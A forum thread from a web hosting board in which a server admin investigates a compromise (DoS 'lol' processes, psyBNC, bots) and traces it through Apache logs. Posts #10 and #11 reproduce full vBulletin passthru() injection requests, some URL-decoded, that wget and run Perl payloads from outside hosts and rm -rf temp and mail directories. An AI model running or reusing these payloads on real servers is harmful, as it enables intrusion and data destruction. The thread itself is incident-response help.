hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Process running as nobody
Reply

Hosting Security and Technology Configuring and optimizing web hosting servers and operating systems, developing administration scripts, building servers, protecting against hackers, and general security (SSL certificates, etc.)
Forum Jump

Process running as nobody

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 01-12-2005, 08:16 AM
Veus Veus is offline
Web Hosting Guru
  
Join Date: Sep 2003
Location: UK
Posts: 342

Process running as nobody

Hi all,

Below is a copy of my top

Code:
12:14:26  up 50 days, 59 min,  1 user,  load average: 0.39, 0.42, 0.59
257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped
CPU states:  15.2% user   5.5% system   0.0% nice   0.0% iowait  79.1% idle
Mem:   514196k av,  502628k used,   11568k free,       0k shrd,  112768k buff
       156332k active,             310968k inactive
Swap: 2104504k av,  196156k used, 1908348k free                  145632k cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME CPU COMMAND
 2465 root      19   0  1184 1184   804 R     5.5  0.2   0:01   0 top
31482 nobody    10   0   608  604   548 S     1.3  0.1   0:10   0 ./lol 30
 1089 root      19  19 33184  13M 10400 S N   0.9  2.7  1646m   0 ./server_linux -PID=tsserver2.pid
28521 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
28523 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
19621 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20010 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20014 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20028 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20469 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
20610 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
22113 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
23021 nobody     9   0   608  604   548 S     0.4  0.1   0:10   0 ./lol 30
23096 nobody     9   0   604  600   544 S     0.4  0.1   0:10   0 ./lol 30
23497 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
23506 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24227 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24229 nobody     9   0   600  596   540 S     0.4  0.1   0:09   0 ./lol 30
25163 nobody     9   0   596  592   536 S     0.4  0.1   0:08   0 ./lol 30
26179 nobody     9   0   584  580   524 S     0.4  0.1   0:07   0 ./lol 30
26561 nobody     9   0   584  580   524 S     0.4  0.1   0:06   0 ./lol 30
27201 nobody     9   0   580  576   520 S     0.4  0.1   0:06   0 ./lol 30
28045 nobody     9   0   576  572   516 S     0.4  0.1   0:06   0 ./lol 30
28381 nobody     9   0   576  572   516 S     0.4  0.1   0:05   0 ./lol 30
28529 nobody     9   0   528  524   464 S     0.4  0.1   0:08   0 ./lol 30
28634 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
28860 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
30670 nobody     9   0   544  540   484 S     0.4  0.1   0:01   0 ./lol 30
31106 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
31254 nobody     9   0   608  604   548 S     0.4  0.1   0:11   0 ./lol 30
    1 root       8   0   472  440   424 S     0.0  0.0   0:58   0 init [3]
    2 root       9   0     0    0     0 SW    0.0  0.0   0:01   0 keventd
    3 root       9   0     0    0     0 SW    0.0  0.0   2:32   0 kapmd
    4 root      19  19     0    0     0 SWN   0.0  0.0   0:00   0 ksoftirqd_CPU0
    5 root       9   0     0    0     0 SW    0.0  0.0   7:31   0 kswapd
    6 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 bdflush
    7 root       9   0     0    0     0 SW    0.0  0.0   2:02   0 kupdated
    8 root     18446744073709551615 -20     0    0     0 SW<   0.0  0.0   0:00   0 mdrecoveryd
   58 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 khubd
  277 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 kjournald
  278 root       9   0     0    0     0 SW    0.0  0.0   4:17   0 kjournald
  279 root       9   0     0    0     0 SW    0.0  0.0   1:25   0 kjournald
  280 root       9   0     0    0     0 SW    0.0  0.0   6:15   0 kjournald
  281 root       9   0     0    0     0 SW    0.0  0.0   3:22   0 kjournald
  750 root       9   0   556  520   476 S     0.0  0.1   3:41   0 syslogd -m 0
  754 root       9   0   420  368   368 S     0.0  0.0   0:00   0 klogd -x
 4411 root       9   0   984  776   776 S     0.0  0.1   0:00   0 /bin/bash
 4414 root       9   0   940  804   788 S     0.0  0.1   0:38   0 /usr/sbin/sshd
 4428 root       8   0   752  668   620 S     0.0  0.1   0:04   0 xinetd -stayalive -pidfile /var/run/xinetd.pid
 4670 root       8   0   580  568   524 S     0.0  0.1   0:18   0 crond
I have just noticed that ./lol 30 scripts being run as nobody.
I have checked /tmp (which is non-executable) /var/tmp (again the same) and have just checked /dev/shm (which isnt non-executable)

I removed a few files from there.
I have tried killing the processes however more seem to appear.

Can anyone help?

Thanks

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

Reply With Quote


Sponsored Links
  #2  
Old 01-12-2005, 08:20 AM
crucialx crucialx is offline
Web Hosting Master
  
Join Date: Feb 2004
Posts: 2,195
Try running:

killall -9 lol

To find the file you can use:

locate lol


You may also want to install and run rkhunter and or chkrootkit.

__________________
crucialparadigm - Affordable, Reliable, Professional :
Web Hosting
24/7 Support • Web Hosting • Reseller Hosting • Cloud/VPS Plans • Dedicated Servers •

Reply With Quote
  #3  
Old 01-12-2005, 08:39 AM
error404 error404 is offline
Web Hosting Master
  
Join Date: Dec 2004
Location: Canada
Posts: 1,076
Looks like your box has been exploited.

__________________
>> Keenan Tims
█▓▒░ I am currently looking for full-time work in the Vancouver area. Resume ░▒▓█
http://www.gotroot.ca/ | ktims@gotroot.ca | skype: keenan.tims

Reply With Quote
Sponsored Links
  #4  
Old 01-12-2005, 08:40 AM
Slidey Slidey is offline
Web Hosting Master
  
Join Date: Apr 2003
Location: UK
Posts: 2,560
if i remember correctly, lol is a dosser, and i suspect you'll find your attacker has got in via an insecure webscript (check things like phpbb + coppermine versions).

check /var/tmp and /tmp for directories such as ". . " and the like

Reply With Quote
  #5  
Old 01-12-2005, 08:51 AM
osphere osphere is offline
Sexy Mariachi
  
Join Date: Nov 2004
Location: Mexico City
Posts: 731
Yep, check tmp or kill all processes running on nobody

Reply With Quote
  #6  
Old 01-12-2005, 11:14 AM
Veus Veus is offline
Web Hosting Guru
  
Join Date: Sep 2003
Location: UK
Posts: 342
Hi there,

I have run locate lol before however nothing out of the ordinary comes up. Just a lot of .gif files.
Im running updatedb and then gonna try locate again to see if anything new comes up.
I have double checked all directorys and removed some more . folders.

Does anyone have a URL or any more information on the lol dosser, so i can isolate it and prevent it in the future?

//EDIT Just found lots of files in /usr/local/apache/proxy

One dir being Strobe which is a port prober. Also a dir called scan which contains the lol files. Also there is a dir called flood is it safe to remove the dir called flood?

Also does apache need the folder called proxy? If so what folders does it need? There is also httpd -DSSL in it, is that another trick?

Thanks

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

Last edited by Veus; 01-12-2005 at 11:24 AM.
Reply With Quote
  #7  
Old 01-12-2005, 11:37 AM
Slidey Slidey is offline
Web Hosting Master
  
Join Date: Apr 2003
Location: UK
Posts: 2,560
ye thats a trick, we've seen the same (hackers?) tools on one of our custoemrs servers repeatedly. Out of interest is this a cpanel server?

they used a file called httpd -DSSL as well as various other rubbish renaming methods. Also included were psybncs and bots. Most of their stuff they kept in /tmp and /var/tmp although i did find stuff elsewhere. Try looking in your apache logs for wget

Reply With Quote
  #8  
Old 01-12-2005, 11:53 AM
Veus Veus is offline
Web Hosting Guru
  
Join Date: Sep 2003
Location: UK
Posts: 342
Thats the same as what i found, quite a few psybncs and a few bots. Ill have a look thanks.
Yea it is a Cpanel server.
Im running grep - i wget * on my logs now to find which user is being careless!

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

Reply With Quote
  #9  
Old 01-12-2005, 12:18 PM
Slidey Slidey is offline
Web Hosting Master
  
Join Date: Apr 2003
Location: UK
Posts: 2,560
we found it was an old version of the coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure ver)

Reply With Quote
  #10  
Old 01-12-2005, 12:20 PM
Veus Veus is offline
Web Hosting Guru
  
Join Date: Sep 2003
Location: UK
Posts: 342
After searching for wget in the domlogs i have found the following entries:

Code:
/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"
/usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803"
/usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64"
/usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
It is a Vbulletin Installation running the latest 3.0.5. Does anyone recognise this pattern?

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

Reply With Quote
  #11  
Old 01-12-2005, 03:13 PM
sehe sehe is offline
Web Hosting Master
  
Join Date: Jun 2003
Posts: 962
Code:
GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527
is
GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo 